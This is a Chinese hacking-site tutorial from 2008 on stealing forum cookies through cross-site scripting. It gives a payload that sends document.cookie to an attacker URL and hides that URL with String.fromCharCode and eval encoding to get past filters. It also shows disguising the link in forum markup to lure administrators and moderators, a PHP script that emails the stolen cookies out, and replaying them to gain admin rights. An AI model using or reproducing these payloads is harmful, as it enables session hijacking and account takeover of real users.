通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 电信网通铁通移动   在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
推荐:XSS攻击Cookie欺骗中隐藏JavaScript执行
责任编辑:酷酷の鱼   更新日期:2008-3-5
 
来源:至尊宝的成长之路

比如发现一处可XSS地方:<script>alert(不管怎么样弹出就好)</script>

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

怎么弄其实也不用我多说了。。

现在主要说的是如何隐藏JavaScript执行。

大家可能习惯每天去milw0rm.com看EXP,

每当发布XSS漏洞的EXP,当我们利用的时候。

却无法cookie任何信息,这是为什么呢。。

像魔力,PHPBB这样大型的论坛都具备XSS漏洞

我给的这个<script>document.location='http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>

会显示Javascript 错误。

解决办法有2种,我们可以把外部敏感信息用unicode编码

给个URL:http://www.mikezilla.com/exp0012.html

通过编码就是这样:

<script>eval(location.href=String.fromCharCode( 104,116,116,112,58,47,47,119,119,119,46,119,52,99, 107,49,110,103,46,99,111,109));</script>

上述还不行就用第2种方法

Javascript fromCharCode中的eval功能

上面说了可以用unicode编码过一些站

比如编码后的104,116,116,112就是HTTP

如果论坛用了其他的编辑器,比如PHPWind 用的所见所得编辑器

直接打上http://url.com肯定会暴露。

那么我们就看编辑器的形式来调换URL

比如偷COOKIE的站是http://www.URL.com

我们就这样

{url=http://www.URL.COM}http://www.url.com{/url}

当然显示的部分你可以替换成吸引人的信息骗取管理和斑竹的点击

用一点社会工程学就可以了。。

好了现在都完成了初步的设想,开始实现吧

第1步:管理看见我们构造好的陷阱,并且点了他

第2步:Javascript 执行成功了。。。

第3步:构造好的偷COOKIE文件偷取到Cookie

第4步:我们不可能傻到URL连接是纯文本,将URL用Unicode编码(这里习惯说是加密)http://www.mikezilla.com/exp0012.html

第5步:截取的Cookie信息当然不是明文的,我们只要使用FireFox Cookie 编辑器
替换COOKIE就OK了,或者用CookieEditor等其他工具。。

个人建议:偷取Cookie不一定就使用空间收取Cookie信息
比如构造个邮箱收取就这样

<?

mail("hackeroo@hotmail.com","cookie monster",$_REQUEST['cookie']);

?>
<html>
<script>document.location='http://www.URL.com/'</script>
</html>

好了偷到有价值的信息替换Cookie就行了。。替换斑竹的就是斑竹权限,替换管理的就和是管理权限。。

完了。。。。

  • 上一篇文章:
  • 下一篇文章: 没有了
  • 最近更新
    固顶文章 一日一动画稿费100元起
    普通文章 瑞星公司03月05日发布 每日计算机病毒及木马播报
    推荐文章 推荐:XSS攻击Cookie欺骗中隐藏JavaScript执行
    普通文章 如何使电脑无法更改系统用户名
    普通文章 Discuz! 6 后台拿Shell的方法
    普通文章 设置Web邮箱黑客警报器 防止财务损失
    普通文章 针对性防御手段 十招教你应对邮件欺诈
    普通文章 使用360安全卫士 教你五分钟搞定装机
    普通文章 企业用户防御网络威胁十要素
    普通文章 安全你我他:IPS与IDS技术路向何方?
    热门文章
    普通文章安全专家:社交网站已成滋生网络攻击的温床
    普通文章黑客组织发布新软件利用Google查找网站漏洞
    普通文章欧盟要求搜索引擎遵守规则保护用户IP地址
    普通文章ALEXA已恢复数据更新
    普通文章关注微软Windows XP SP3 RC2安全性
    普通文章盗号木马猖獗 用户账号需妥善管理
    普通文章桌面伪装木马发威 牧民远程控制作祟
    普通文章小心新病毒冒充杀毒软件 耍你没商量
    普通文章高手支招:电脑每天“洗澡”可防隐私被窥
    推荐文章推荐:步步为营保障安全:中毒后六大紧急措施
    精彩专题